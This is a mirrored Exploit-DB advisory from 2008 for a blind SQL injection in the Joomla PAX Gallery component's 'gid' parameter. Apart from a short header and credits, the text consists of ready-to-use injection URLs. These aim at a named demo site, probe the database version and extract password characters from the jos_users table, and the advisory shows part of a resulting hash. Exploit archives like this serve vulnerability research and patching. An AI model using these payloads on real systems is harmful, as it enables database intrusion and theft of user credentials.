bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/7587.txt
Offensive Security 6bd122cd4b Updated 12_12_2013
2013-12-12 21:02:26 +00:00

36 lines
1 KiB
Text
Executable file
Raw Blame History

[■] Joomla Component PAX Gallery v 0.1 (gid) <= Blind SQL Injection Vulnerability
>---------------------------------------<
> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> Note: safe mode = ON
> Autor script: Tobias Floery
>---------------------------------------<
[■] ExPL0iT:
|: http://www.example.com/path/com_paxgallery&task=table&gid=[$qL]
[■] D£M0:
>Version:
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=5 [Ye$]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20substring(@@version,1,1)=4 [Noo]
|: http://www.komponenten.joomlademo.de/index.php?option=com_paxgallery&task=table&gid=1%20and%20ascii(substring((select%20password%20from%20jos_users%20limit%201,1),1,1))%3E100
d8e423..ecc... ;-)
[■] Th4nKs::
\> Str0ke </ \> Securitycode Team </ \> StaKer </
# milw0rm.com [2008-12-28]
Reference in a new issue View git blame Copy permalink